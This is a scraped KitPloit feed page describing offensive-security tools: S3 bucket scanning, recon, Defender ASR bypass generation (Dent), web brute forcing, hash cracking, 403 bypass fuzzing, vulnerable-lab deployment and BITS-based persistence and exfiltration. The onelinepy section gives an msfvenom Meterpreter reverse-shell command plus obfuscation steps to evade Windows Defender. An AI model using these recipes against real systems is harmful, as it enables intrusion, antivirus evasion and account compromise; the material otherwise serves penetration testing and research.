Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

Bucky - An Automatic S3 Bucket Discovery Tool

$
0
0


Bucky is an automatic tool designed to discover S3 bucket misconfiguration, Bucky consists up of two modules Bucky firefox addon and Bucky backend engine. Bucky addon reads the source code of the webpages and uses Regular Expression(Regex) to match the S3 bucket used as Content Delivery Network(CDN) and sends it to the Bucky Backend engine. The backend engine receives the data from addon and checks if the S3 bucket is publicly writeable or not. Bucky automatically uploads a text file as Proof Of Concept(PoC) if the bucket is vulnerable.


Working

Bucky addon sends the details of s3 bucket name discovered from a user visited web pages to backend engine. It uses AWS PHP SDK to discover misconfiguration. Users can also check for S3 bucket misconfiguration manually. All the results from automatic and manuall check are populated to dashboard.

Checkout video https://vimeo.com/444442588


Installation
git clone https://github.com/smaranchand/bucky.git
cd bucky

Requirements: AWS Access Keys and PHP installation

Get AWS Access Keys: https://console.aws.amazon.com/iam/home?#/security_credentials

PHP installation: Install according to your OS, apt install php7.3 / brew install php7.3

Currently, Bucky addon is not published in the Firefox addon store; as soon as the addon will be published, the addon link will be provided.

For now, users can manually load the addon into the browser to do so

  1. Open Firefox browser and visit about:debugging
  2. Click on "This Firefox" > Load Temporary Add-on
  3. Select the addon located at bucky/addon/bucky.js

Add AWS Access keys:

cd bucky/
nano config.inc.php
Add your AWS Access Key ID and Secret Access Key. (On-Line 57 and 61)

Usage

To use Bucky, load the Bucky addon to the browser and start backend engine.

cd bucky/
chmod +x run.sh
./run.sh

The backend engine runs on http://127.0.0.1:13337
Browse websites, Bucky will discover S3 buckets automatically and will be reflected in the dashboard.
Visit the above address to access Bucky dashboard.

Screenshots

Running Bucky


Loading Addon


User Interface

 

All Buckets


Manual Check


POC By Bucky

 

Note

Bucky is not a perfect tool to discover S3 buckets, it is well known that Bucky lacks many feautres and it may fail to detect the misconfiguration sometimes. Certain changes and development are in pipeline. I really appreciate the feedbacks and contribution.




magicRecon - A Powerful Shell Script To Maximize The Recon And Data Collection Process Of An Objective And Finding Common Vulnerabilities

$
0
0


MagicRecon is a powerful shell script to maximize the recon and data collection process of an objective and finding common vulnerabilities, all this saving the results obtained in an organized way in directories and with various formats.

The new version of MagicRecon has a large number of new tools to automate as much as possible the process of collecting data from a target and searching for vulnerabilities. It also has a menu where the user can select which option he wants to execute.

This new version also has the option of "Install dependencies" with which the user can easily install all the tools and dependencies that are needed to run MagicRecon. The script code has been made in a modular way so that any user can modify it to their liking. With MagicRecon you can easily find:

  • Sensitive information disclosure.
  • Missing HTTP headers.
  • Open S3 buckets.
  • Subdomain takeovers.
  • SSL/TLS bugs.
  • Open ports and services.
  • Email spoofing.
  • Endpoints.
  • Directories.
  • Juicy files.
  • Javascript files with senstive info.
  • CORS missconfigurations.
  • Cross-site scripting (XSS).
  • Open Redirect.
  • SQL Injection.
  • Server-side request forgery (SSRF).
  • CRLF Injection.
  • Remote Code Execution (RCE).
  • Other bugs.

Disclaimer

The author of this document take no responsibility for correctness. This project is merely here to help guide security researchers towards determining whether something is vulnerable or not, but does not guarantee accuracy.Warning: This code was originally created for personal use, it generates a substantial amount of traffic, please use with caution.


Requirements

To run the project, you will need to install the following tools:


IMPORTANT: Remember to configure the Notify and Subfinder tools to work properly.

Usage
vulnerability analysis with notifications via Discord, Telegram or Slack 3) Subdomain enumeration 4) Subdomain enumeration and vulnerability scanning with nuclei 5) Subdomain enumeration with common vulnerabilities scanning 6) Scan for javascript files 7) Scan for files and directoires 8) All in one! (original MagicRecon) q) Exit Choose a option: ">
./magicRecon.sh

Output:

__ __ _ ____
| \/ | __ _ __ _(_) ___| _ \ ___ ___ ___ _ __
| |\/| |/ _` |/ _` | |/ __| |_) / _ \/ __/ _ \| '_ \
| | | | (_| | (_| | | (__| _ < __/ (_| (_) | | | |
|_| |_|\__,_|\__, |_|\___|_| \_\___|\___\___/|_| |_|
|___/

MENU
1) Install dependencies
2) Massive vulnerability analysis with notifications via Discord, Telegram or Slack
3) Subdomain enumeration
4) Subdomain enumeration and vulnerability scanning with nuclei
5) Subdomain enumeration with common vulnerabilities scanning
6) Scan for javascript files
7) Scan for files and directoires
8) All in one! (original MagicRecon)
q) Exit
Choose a option:



Special thanks

About me

Twitter



Dent - A Framework For Creating COM-based Bypasses Utilizing Vulnerabilities In Microsoft's WDAPT Sensors

$
0
0


More Information

If you want to learn more about the techniques utlized in this framework please take a look at this article.


Description

This framework generates code to exploit vulnerabilties in Microsoft Defender Advanced Threat Protection's Attack Surface Reduction (ASR) rules to execute shellcode without being detected or prevented. ASR was designed to be the first line of defense, detecting events based on actions that violate a set of rules. These rules focus on specific behavior indicators on the endpoint that are often associated with an attacker’s Tactics, Techniques, or Procedures (TTPs). These rules have a heavy focus on the Microsoft Office suite, as this is a common attack vector for establishing a remote foothold on an endpoint. A lot of the rule-based controls focus on network-based or process-based behavior indicators that stand out from the normal business operation. These rules focus on either the initial compromise of a system or a technique that can severely impact an organization (e.g., disclosure of credentials or ransomware). They cover a large amount of the common attack surface and focus on hampering known techniques used to compromise assets.

Dent takes advantage of several vulnerabilities to bypass these resticive controls to execute payloads on an endpoint without being blocked or effectively detected by Microsoft Defender Advanced Threat Protection sensors. The article above outlines this vulnerabilties that are STILL present in Microsoft Defender Advanced Threat Protection even after disclosure.


Install

The first step as always is to clone the repo, then build it

go build Dent.go

Help
./Dent -h

________ __
\______ \ ____ _____/ |_
| | \_/ __ \ / \ __\
| | \ ___/| | \ |
/_______ /\___ >___| /__|
\/ \/ \/
(@Tyl0us)

"Call someone a hero long enough, and they'll believe it. They'll become it.
They have no choice. Let them call you a monster, and you become a monster."


Usage of ./Dent:
-C string
Name of the COM object.
-N string
Name of the XLL playload when it's writen to disk.
-O string
Name of the output file. (default "output.txt")
-P string
Path of the DLL for your COM object. (Either use \\ or '' around the path)
-U string
URL where the base64 encoded XLL payload is hosted.
-show
Display the script in the terminal.

Weaponizing

This framwork is intended for exploiting vulnerabilities and deficiencies in Microsoft Defender Advanced Threat Protection, because of that it does not actually generate any payloads/implants. In order to generate those, you can use a large number of tools publicly availalble, however all research, development and testing was done using ScareCrow. Microsoft Defender Advanced Threat Protection doesn't rely on userland hooking for telemetry rather it utilized various other mechanisms such as kernel callbacks. From testing, this framework works extremely well at bypassing Microsoft Defender Advanced Threat Protection to execute shellcode.


Techniques

At the time of release there are currently two techniques. I will be constantly adding different ones that utilize these vulnerabilities in different ways peroidically so please stay tuned for more.


Fake COM Object Mode

COM objects are often created when an application is being installed on to a system. Once created, any application or script can call them, however this isn't the only way to create them. By modifying/creating registry keys into the HKEY_CLASSES_ROOT section of the Windows Registry, we can create a COM object that points to our shellcode on the system. This means any application or script that can utlize COM can call it, executing the shellcode.

This works because of how CoCreatInstance API functions. CoCreateInstance is used to create and initialize COM objects based on the CLSID (a globally unique identifier used to identify a specific COM class object). This function pulls the information to execute the call using the values stored in registry keys. These CLSID values can be found in the HKEY_CLASSES_ROOT\CLSID\ path of the registry. However, before a process can call the CLSID, it must know that CLSID's value. This is done by first performing a registry query to look for the COM object in HKEY_CLASSES_ROOT\<COM object name>, and if it exists, a second registry query will be made to get the CLSID value stored in the subfolder.

Further inspection of the registry's subfolders shows the permission for the CLSID values are not consistent. A large majority of COM objects stored here only allow “Full Control” permission to the Trusted Installer. The Trusted Installer is a service account that owns resources to protect them, even from Administrators. This is intended to ensure that even if an attacker obtains administrative privileges, the resources cannot be manipulated maliciously. Unfortunately, a lot of COM Objects allow anyone in the Administrators groups “Full Control” permission. In addition, the root key CLSID allows the Administrators group “Full Control” permissions rather than NT AUTHORITY\System or Trusted Installer. Because of this, under an elevated context we can create, or even modify specific COM objects values.


 

Important

The creation of these registry keys only works if you run it under an elevated context. Double clicking on this through a GUI will not execute the .VBS file in an elevated context even if you are an administator. It is recommened you run it from an Administative shell or command prompt. However, once the keys are created, any application can call this COM object under any context.


ScareCrow Weaponizing

To utilize a ScareCrow payload with this type of bypass you can run the following command:

./ScareCrow -I <path to your raw stageless shellcode>  -domain <domain name> -Loader dll

Usage

Once you have your payload, use the -N flag for the name of the payload when it's written to disk, the -C flag for the name of the COM object, the -I flag for the location to write it to, and lastly the -O for the output file to store the content.


Remote .XLL Payload Mode

This option generates a block of code to bypass several ASR rules to download, write to disk, load and execute shellcode, bypassing ASR preventative controls. This is done using the Excel.Application COM object which represents the entire Excel Application, but in an automated form, and allows for the programmatical interaction with it. Because this is still Excel, it does not trigger the ASR rule. This because when we call Excel.Application, we can see that it spawns under a Service Host process (Svchost.exe) and not the WinWord.exe process. While Svchost.exe is a system-level process used to host multiple Windows-based services, the child process created (Excel.exe) did not gain system-level privileges.

Because we created a COM object that was an entire application, the Excel process was created under Svchost.exe so it could be handled properly to prevent any instabilities to the WinWord.exe process. Though this process is under Svchost.exe, there is another challenge to contend with: executing shellcode. As binary execution or using WinAPI inside a macro will trigger other ASR rules, this limits what we can do without triggering an ASR rule or getting caught by WDAPT's EDR component. This is where DLLs shine. If a DLL-based payload is compiled with the right export functions, it can be used as an Office plugin that, when loaded, will automatically run shellcode. To do this, we can utilize Excel's RegisterXLL function. The RegisterXLL function loads an XLL plugin into memory, automatically registering and executing it. XLL files are essentially Excel-based DLLs.

To get the content on the system, we can use another COM object (Microsoft.XMLHTTP), gaining the ability to execute an HTTP request, in this case, an HTTP GET request to a URL. The second COM object (ADODB.stream) provides the ability to read/write bytes of a data stream. By combining the two COM objects, an attacker can request a remote resource through an HTTP GET request and write the response (in this case, the file itself) to disk. This is done using the COM object (ADODB.stream) again to handle read/write bytes of the data stream. The second COM object (Microsoft.XMLDOM) allows the reading of data stored in a file. The XMLDCOM object allows for the data type to be set (in this case, base64) and once opened and stored in a string with the proper datatype, the ADODB.stream object can write the string of code to disk using a different data type (in this case, BinaryStreamType), converting the base64 string back into a binary form.


ScareCrow Weaponizing

To utilize a ScareCrow payload with this type of bypass you can run the following command:

./ScareCrow -I <path to your raw stageless shellcode>  -domain <domain name> -Loader excel  -O <Output filename>

Once generated, copy line 13 and 14 from the outputted file, and merge them together, making sure to remove:

  • the var <variable name>
  • the ; at the end of each line
  • the quotes around each string



Usage

Once you have your encoded payload, use the -N flag for the name of the payload when it's written to disk, the -U flag for the URL the encoded payload is going be hosted on (i.e https:///), and -F flag for the name of the file being hosted by the site. The outputted code is designed to work in a macro document .


Lack of WDAPT Sensor Recording

Through further investigation, it was observed not as a gap in WDATP's sensors, but rather that WDATP does have visibility into this activity, but it is ignored. Through WDATP endpoint's timeline of events looking for any reference to Appwiz.xll, we observed that WDAPT recorded a “created file” event when Word created the file AppWiz.xll. It is important to note that .XLL files are executable.


Disclosure Time

11/20/2020 - Research development and article written.

03/14/2021 - Provided Microsoft a preliminary disclosure document outlining identified issues.

03/31/2021 - Microsoft recognized and acknowledged that the vulnerabilities related to spawning an Office child process and writing files to disk were real vulnerabilities and began working on remediation. However, the permissions inconsistencies in the registry were deemed not a vulnerability due to the requirement of elevated privileges.

04/21/2021 - Microsoft informed the author that signature build 1.333.1055.0 released on 03/22/2021 and 1.335.1321.0 released on 04/21/2021 contained the detection for the Office application-based vulnerabilities and closed the case.

04/22/2021 - The author retested the same techniques identifying that the vulnerabilities were still present.



Arkhota - A Web Brute Forcer For Android

$
0
0


What?

Arkhota is a web (HTTP/S) brute forcer for Android.


Why?

A web brute forcer is always in a hacker's computer, for obvious reasons. Sometimes attacks require to be quick or/and with minimal device preparation. Also a phone takes less attention rather than a laptop/computer. For this situations here's Arkhota.


Download

You can download APK from there.


Usage

Explanation is in order of objects in the APK from top to bottom.


Banner
  • Banner, version & author

You can long click to version to see about page.


Connection
  • URL (required)

An URL to make request.

  • Body

You need to specify a body if you are going to make a POST request.


Userlist / Wordlist
  • Userlist selector

Single: Sets a single username

Generate: Generates runtime with given options

Wordlists: Sets prepared wordlist

Custom wordlist: You can place your custom wordlist to /sdcard/ABF/

Then this selector will have it (if required permissions given.).

  • Username box

You need to specify a username if you selected Single.

  • Charset selectors

[W] You need to specify charset, min & max length to generate runtime.

If you selected Generate, checkboxes will help you to select._

  • Prefix & Suffix

You can specify prefix & suffix to be added to your username


It's same for the password part too.

Configuration
  • Beep switch

Beeps if attack success.

  • Fail/Success switch

Decides how to react connection response

  • POST/GET switch

Decides type of connection

  • User-Agent

_Sets user-agent for connection.

if "Original UA" set, then original user-agent set

Othervise given text will set to user-agent_


tip: It has autocomplete for several user-agents, all of them starts with "Mozilla", type and select one if you don't want to expose your original ua, but you don't know what to set
  • Timeout

Sets timeout for connection, in milliseconds

  • Cookie

Sets cookie value for connection

  • Regex (required)

Determines what to look in connection response

  • Empty box

Tried username:password pairs & result will shown there.

  • [W] Start

Starts attack!


Important

URL & Body: ^USER^& ^PASS^ are placeholders for username and password. You need to place them in url or the body (depends what type you choose to connection)

Regex & Fail/Success switch: These two determines the result of the attack.

If switch points to "Fail", and if given regex found in the response, this means, this is a fail, continue to attack.

if switch points to "Success", and if given regex found in response, this means this is a success!, write result to empty box (in format "FOUND: username:password") and stop the attack.

Copying: Long click on the empty box will copy the content. if password found, it copies in username:password format Otherwise copies whole content.

If attack is over and unsuccessful, it just stops at the last user:password.


Screenshots & Videos



[W]arning

Runtime changeable parameters

Every parameter editable during attack, but none of the parameters will changeable during attack, except two. "Fail/Success" and "Beep" switch.

This means: If you started the attack, and want to change a parameter (e.g charset), editing will not change anything, this changes applies after pressing start button. BUT If you started the attack with beep option on, and you want to change it. You don't need to re-start attack, just click on switch and it won't beep when attack success.


About "Generate" & Custom wordlists

The Generate option is NOT recommended Runtime generating & parsing is a really hard work for a phone. Also it's not stable, all possible words will be generated, but may not be sequential. If you really need to select it, keep everything minimum. If your phone freezes or crashes, you know selected options is not suitable your phone's processor.

Do NOT place big wordlists to /ABF/ directory. This will cause freezing & crashing.

And do NOT forget standard smartphones have far less processor power rather than a computer, this project is for small and quick attacks.


About speed

Depends on your speed of network & remote host.


How to stop the attack

This version of Arkhota doesn't support "stopping the attack". BUT that doesn't mean you cannot stop. Just change "Fail/Success" switch to opposite direction and wait one more request. This will cause a false-positive on purpose to stop. Or You can simply close and re-open the application.


PS: I know.. I know... This project gave me a headache, I didn't even try to put a stop button there.


Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads

$
0
0


 Python Obfuscator To Generate One-Liners And FUD Payloads.

Download & Run
git clone https://github.com/spicesouls/onelinepy
cd onelinepy
chmod +x setup.sh
./setup.sh
onelinepy

Usage Guide
              _ _                 
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|

usage: oneline.py [-h] [-m M] [-i I] [--script SCRIPT] [--code CODE] [--list] [--output OUTPUT]

optional arguments:
-h, --help show this help message and exit
-m M Obfustucating Method (i.e, -m /one_line/base64)
-i I Iterations For Obfustucation.
--script SCRIPT File path of Python file to Obfustucate.
--code CODE Python code to Obfustucate.
--list List Obfustucating Methods.
--output OUTPUT Output File.

Example: Creating FUD Meterpreter Python Payload
  1. Generate Python Payload:

msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt

  1. Obfustucate Payload

onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt

  1. Profit! The Obfustucated Payload works against Windows Defender.

More Examples
onelinepy -m /one_line/base64 --script payload.py -i 3
onelinepy -m /one_line/hex --code "print('HEX!')"

Obfustucation Method List
              _ _                 
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|


Obfustucators ( * = May cause Syntax Errors )
-=============-
0 /one_line/hex
1 /one_line/base64
2 /one_line/base32
3 /one_line/gunzip*
4 /one_line/rot13*
5 /cmd/command
6 /cmd/powershell
7 /cmd/powershellhidden


403Fuzzer - Fuzz 403/401Ing Endpoints For Bypasses

$
0
0


Fuzz 403ing endpoints for bypasses


Follow on twitter! @intrudir

This tool will check the endpoint with a couple of headers such as X-Forwarded-For

It will also apply different payloads typically used in dir traversals, path normalization etc. to each endpoint on the path.
e.g. /%2e/test/test2/test/%2e/test2/test;/test2/


Usage
usage: 403fuzzer.py [-h] [-u URL] [-m {GET,POST,PUT,PATCH}] [-d DATA_PARAMS] [-c COOKIES] [-H HEADER] [-p PROXY] [-hc HC] [-hl HL] [-sf] [--save SAVE] [-sh] [-su]

use this script to fuzz endpoints that return a 401/403

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Specify the target URL
-m {GET,POST,PUT,PATCH}, --method {GET,POST,PUT,PATCH}
Specify the HTTP method/verb
-d DATA_PARAMS, --data DATA_PARAMS
Specify data to send with the request.
-c COOKIES, --cookies COOKIES
Specify cookies to use in requests. (e.g., --cookies "cookie1=blah; cookie2=blah")
-H HEADER, --header HEADER
Add headers to your request (e.g., --header "Accept: application/json" --header "Host: example.com"
-p PROXY, --proxy PROXY
Specify a proxy to use fo r requests (e.g., http://127.0.0.1:8080)
-hc HC Hide response code from output, single or comma separated
-hl HL Hide response length from output, single or comma separated
-sf, --smart Enable the smart filter
--save SAVE Saves stuff to a file when you get your specified response code
-sh, --skip-headers Skip testing bypass headers
-su, --skip-urls Skip testing path payloads


Basic examples
python3 403fuzzer.py -u http://example.com/test1/test2/test3/forbidden.html



Specify cookies to use in requests:

(minus the cookie header name) Examples:

--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"


Specify a method/verb and body data to send
403fuzzer.py -u https://example.com -m POST -d "param1=blah&param2=blah2"
403fuzzer.py -u https://example.com -m PUT -d "param1=blah&param2=blah2"


Specify custom headers to use with every request

Maybe you need to add some kind of auth header like Authorization: bearer <token> Specify -H "header: value" for each additional header you'd like to add:

403fuzzer.py -u https://example.com -H "Some-Header: blah" -H "Authorization: Bearer 1234567"


Specify a proxy to use

Useful if you wanna proxy through Burp

403fuzzer.py -u https://example.com --proxy http://127.0.0.1:8080


Skip sending header payloads or url payloads
# skip sending headers payloads
403fuzzer.py -u https://example.com -sh
403fuzzer.py -u https://example.com --skip-headers

# Skip sending path normailization payloads
403fuzzer.py -u https://example.com -su
403fuzzer.py -u https://example.com --skip-urls


Hide response code/length

Provide comma delimited lists without spaces. Examples:

# Hide response codes
403fuzzer.py -u https://example.com -hc 403,404,400

# Hide response lengths of 638
403fuzzer.py -u https://example.com -hl 638


Smart filter feature!

Based on response code and length. If it sees a response 8 times or more it will automatically mute it. repeats are changeable in the code until I add an option to specify it in flag NOTE: Can't be used simultaneously with -hc or -hl (yet)

# toggle smart filter on
403fuzzer.py -u https://example.com --smart


Save requests for matching response code

Will save to a file named saved.txt Useful for later inspection

 # save requests where the response code matched 200
403fuzzer.py -u https://example.com --save 200


TODO:
  • Add other methods/verbs for bypass, e.g. POST requests
  • Maybe add an output file option for 200 OKs
  • Looking for ideas. Ping me on twitter! @intrudir


Bn-Uefi-Helper - Helper Plugin For Analyzing UEFI Firmware

$
0
0


Helper plugin for analyzing UEFI firmware. This plugin contains the following features:

  • Apply the correct prototype to the entry point function
  • Fix segments so all segments are RWX and have the correct semantics
    • This allows for global function pointers to be rendered correctly
  • Apply types for core UEFI services (from EDK-II)
  • Locate known protocol GUIDs and assign the GUID type and a symbol
  • Locate global assigments in entry and initialization functions and assign types
    • EFI_SYSTEM_TABLE, EFI_RUNTIME_SERVICES, EFI_BOOT_SERVICES, etc...
  • Loader for Terse Executables

Minimum Version

Tested on 2.3.2660



License

This plugin is released under a MIT license.


Related Projects


Penglab - Abuse Of Google Colab For Cracking Hashes

$
0
0


Abuse of Google Colab for fun and profit.


What is it ?

Penglab is a ready-to-install setup on Google Colab for cracking hashes with an incredible power, really useful for CTFs. (See benchmarks below.)

It installs by default :

  • Hashcat
  • John
  • Hydra
  • SSH (with ngrok)

And now, it can also :

  • Launch an integrated shell
  • Download the wordlists Rockyou and HashesOrg2019 quickly !

You only need a Google Account to use Google Colab, and to use ngrok for SSH (optional).


How to use it ?
  1. Go on : https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb
  2. Select "Runtime", "Change runtime type", and set "Hardware accelerator" to GPU.
  3. Change the config by setting "True" at tools you want to install.
  4. Select "Runtime" and "Run all" !

What is Google Colab ?

Google Colab is a free cloud service, based on Jupyter Notebooks for machine-learning education and research. It provides a runtime fully configured for deep learning and free-of-charge access to a robust GPU.


Benchmarks

Hashcat Benchmark :
====================
* Device #1: Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU

OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla P100-PCIE-16GB, skipped

Benchmark relevant options:
===========================
* --optimized-kernel-enable

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 55

Hashmode: 0 - MD5

Speed.#1.........: 27008.0 MH/s (69.17ms) @ Accel:64 Loops:512 Thr:1024 Vec:8

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 55

Hashmode: 100 - SHA1

Speed.#1.........: 9590.3 MH/s (48.61ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 55

Speedtest :
Testing from Google Cloud (35.203.136.151)...  Retrieving speedtest.net server list...  Selecting best server based on ping...  Hosted by KamaTera INC (Santa Clara, CA) [11.95 km]: 28.346 ms  Testing download speed................................................................................  Download: 2196.68 Mbit/s  Testing upload speed......................................................................................................  Upload: 3.87 Mbit/s  



Metarget - Framework Providing Automatic Constructions Of Vulnerable Infrastructures

$
0
0


1 Introduction

Metarget = meta- + target, a framework providing automatic constructions of vulnerable infrastructures, used to deploy simple or complicated vulnerable cloud native targets swiftly and automatically.


1.1 Why Metarget?

During security researches, we might find that the deployment of vulnerable environment often takes much time, while the time spent on testing PoC or ExP is comparatively short. In the field of cloud native security, thanks to the complexity of cloud native systems, this issue is more terrible.

There are already some excellent security projects like Vulhub, VulApps in the open-source community, which pack vulnerable scenes into container images, so that researchers could utilize them and deploy scenes quickly.

However, these projects mainly focus on vulnerabilities in applications. What if we need to study the vulnerabilities in the infrastructures like Docker, Kubernetes and even Linux kernel?

Hence, we develop Metarget and hope to solve the deployment issue above to some extent. Furthermore, we also expect that Metarget could help to construct multilayer vulnerable cloud native scenes automatically.


1.2 Install Vulnerability!

In this project, we come up with concepts like installing vulnerabilities and installing vulnerable scenes. Why not install vulnerabilities just like installing softwares? We can do that, because our goals are security research and offensive security.

To be exact, we expect that:

  • metarget cnv install cve-2019-5736 will install Docker with CVE-2019-5736 onto the server.
  • metarget cnv install cve-2018-1002105 will install Kubernetes with CVE-2018-1002105 onto the server.
  • metarget cnv install kata-escape-2020 will install Kata-containers with CVE-2020-2023/2025/2026 onto the server.
  • metarget cnv install cve-2016-5195 will install a kernel with DirtyCoW into the server.

It's cool, right? No more steps. No RTFM. Execute one command and enjoy your coffee.

Furthermore, we expect that:

  • with Metarget's help, ethical hackers are able to deploy simple or complicated cloud native targets swiftly and learn by hacking cloud native environments.
  • metarget appv install dvwa will install a DVWA target onto our vulnerable infrastructure.
  • metarget appv install thinkphp-5-0-23-rce --external will install a ThinkPHP RCE vulnerability with NodePort service onto our vulnerable infrastructure.

You can just run 5 commands below after installing a new Ubuntu and obtain a multi-layer vulnerable scene:

./metarget cnv install cve-2016-5195 # container escape with dirtyCoW
./metarget cnv install cve-2019-5736 # container escape with docker
./metarget cnv install cve-2018-1002105 # kubernetes single-node cluster with cve-2018-1002105
./metarget cnv install privileged-container # deploy a privileged container
./metarget appv install dvwa --external # deploy dvwa target

RCE, container escape, lateral movement, persistence, they are yours now.

More awesome functions are coming! Stay tuned :)

Note:

Thie project aims to provide vulnerable scenes for security research. The security of scenes generated is not guaranteed. It is NOT recommended to deploy components or scenes with Metarget on the Internet.


2 Usage

2.1 Basic Usage
usage: metarget [-h] [-v] subcommand ...

automatic constructions of vulnerable infrastructures

positional arguments:
subcommand description
gadget cloud native gadgets (docker/k8s/...) management
cnv cloud native vulnerabilities management
appv application vulnerabilities management

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit

Run ./metarget gadget list to see cloud native components supported currently.


2.2 Manage Cloud Native Components
usage: metarget gadget [-h] subcommand ...

positional arguments:
subcommand description
list list supported gadgets
install install gadgets
remove uninstall gadgets

optional arguments:
-h, --help show this help message and exit

2.2.1 Case: Install Docker with Specified Version

Run:

./metarget gadget install docker --version 18.03.1

If the command above completes successfully, 18.03.1 Docker will be installed.


2.2.2 Case: Install Kubernetes with Specified Version

Run:

./metarget gadget install k8s --version 1.16.5

If the command above completes successfully, 1.16.5 Kubernetes single-node cluster will be installed.

Note:

Usually, lots of options need to be configured in Kubernetes. As a security research project, Metarget provides some options for installation of Kubernetes:

  -v VERSION, --version VERSION
gadget version
--cni-plugin CNI_PLUGIN
cni plugin, flannel by default
--pod-network-cidr POD_NETWORK_CIDR
pod network cidr, default cidr for each plugin by
default
--taint-master taint master node or not

Metarget supports deployment of multi-node cluster. If you want to add more nodes into the cluster, you can copy tools/install_k8s_worker.sh script and run it on each worker nodes after the successful installation of single-node cluster.


2.2.3 Case: Install Kata-containers with Specified Version

Run:

./metarget gadget install kata --version 1.10.0

If the command above completes successfully, 1.10.0 Kata-containers will be installed.

Note:

You can also specify the type of kata runtime (qemu/clh/fc/...) with --kata-runtime-type option, which is qemu by default.


2.2.4 Case: Install Linux Kernel with Specified Version

Run:

./metarget gadget install kernel --version 5.7.5

If the command above completes successfully, 5.7.5 kernel will be installed.

Note:

Currently, Metarget install kernels in 2 ways:

  1. apt
  2. if apt package is not available, download *.deb remotely from Ubuntu and try to install

After successful installation of kernel, reboot of system is needed. Metarget will prompt to reboot automatically.


2.3 Manage Vulnerable Scenes Related to Cloud Native Components
usage: metarget cnv [-h] subcommand ...

positional arguments:
subcommand description
list list supported cloud native vulnerabilities
install install cloud native vulnerabilities
remove uninstall cloud native vulnerabilities

optional arguments:
-h, --help show this help message and exit

Run ./metarget cnv list to see vulnerable scenes related to cloud native components supported currently.


2.3.1 Case: CVE-2019-5736

Run:

./metarget cnv install cve-2019-5736

If the command above completes successfully, Docker with CVE-2019-5736 will be installed。


2.3.2 Case: CVE-2018-1002105

Run:

./metarget cnv install cve-2018-1002105

If the command above completes successfully, Kubernetes with CVE-2018-1002105 will be installed。


2.3.3 Case: Kata-containers Escape

Run:

./metarget cnv install kata-escape-2020

If the command above completes successfully, Kata-containers with CVE-2020-2023/2025/2026 will be installed。


2.3.4 Case: CVE-2016-5195

Run:

./metarget cnv install cve-2016-5195

If the command above completes successfully, kernel with CVE-2016-5195 will be installed。


2.4 Manage Vulnerable Scenes Related to Cloud Native Applications
usage: metarget appv [-h] subcommand ...

positional arguments:
subcommand description
list list supported application vulnerabilities
install install application vulnerabilities
remove uninstall application vulnerabilities

optional arguments:
-h, --help show this help message and exit

Run ./metarget appv list to see vulnerable scenes related to cloud native applications supported currently.

Note:

Before deploying application vulnerable scenes, you should install Docker and Kubernetes firstly. You can use Metarget to install Docker and Kubernetes.


2.4.1 Case: DVWA

Run:

./metarget appv install dvwa

If the command above completes successfully, DVWA will be deployed as Deployment and Service resources in current Kubernetes.

Note:

You can specify --external option, then the service will be exposed as NodePort, so that you can visit it by IP of the host node.

By default, the type of service is ClusterIP.


2.5 Manage Vulnerable Cloud Native Target Cluster

Developing, currently not supported.


3 Installation

3.1 Requirements
  • Ubuntu 16.04 or 18.04
  • Python >= 3.5
  • pip3

3.2 From Source

Clone the repository and install requirements:

git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip install -r requirements.txt

Begin to use Metarget and construct vulnerable scenes. For example:

./metarget cnv install cve-2019-5736

3.3 From PyPI

Currently unsupported.


4 Scene List

4.1 Vulnerable Scenes Related to Cloud Native Components
NameClassTypeCVSS 3.xStatus
cve-2018-15664dockercontainer_escape7.5
cve-2019-13139dockercommand_execution8.4
cve-2019-14271dockercontainer_escape9.8
cve-2020-15257docker/containerdcontainer_escape5.2
cve-2019-5736docker/runccontainer_escape8.6
cve-2017-1002101kubernetescontainer_escape9.6
cve-2018-1002105kubernetesprivilege_escalation9.8
cve-2019-11253kubernetesdenial_of_service7.5
cve-2019-9512kubernetesdenial_of_service7.5
cve-2019-9514kubernetesdenial_of_service7.5
cve-2020-8554kubernetesman_in_the_middle5.0
cve-2020-8557kubernetesdenial_of_service5.5
cve-2020-8558kubernetesexposure_of_service8.8
cve-2016-5195kernelcontainer_escape7.8
cve-2018-18955kernelprivilege_escalation7.0
cve-2020-14386kernelcontainer_escape7.8
cap_dac_read_search-containerconfigcontainer_escape-
cap_sys_admin-containerconfigcontainer_escape-
cap_sys_ptrace-containerconfigcontainer_escape-
privileged-containerconfigcontainer_escape-
mount-docker-sockmountcontainer_escape-
mount-host-etcmountcontainer_escape-
mount-host-procfsmountcontainer_escape-
kata-escape-2020kata-containerscontainer_escape6.3/8.8/8.8

4.2 Vulnerable Scenes Related to Cloud Native Applications

These scenes are mainly derived from other open-source projects:

We express sincere gratitude to projects above!

Metarget converts scenes in projects above to Deployments and Services resources in Kubernetes (thanks to kompose).

To list vulnerable scenes related to cloud native applications supported by Metarget, just run:

./metarget appv list

5 DEMO


6 Development Plan
  • deployments of basic cloud native components (docker, k8s)
  • integrations of vulnerable scenes related to cloud native components
  • integrations of RCE scenes in containers
  • automatic construction of multi-node cloud native target cluster
  • integrations of other cloud native vulnerable scenes (long term)

7 Maintainers

8 About Logo

It is not a Kubernetes, but a vulnerable infrastructure with three gears which could not work well (vulnerable) :)



Shepard - In Progress Persistent Download/Upload/Execution Tool Using Windows BITS

$
0
0


This is an IN PROGRESS persistance tool using Windows Background Intelligent Transfer Service (BITS).

Functionality: File Download, File Exfiltration, File Download + Persistent Execution

Usage: run shepard.exe as Administrator with the following command line arguments

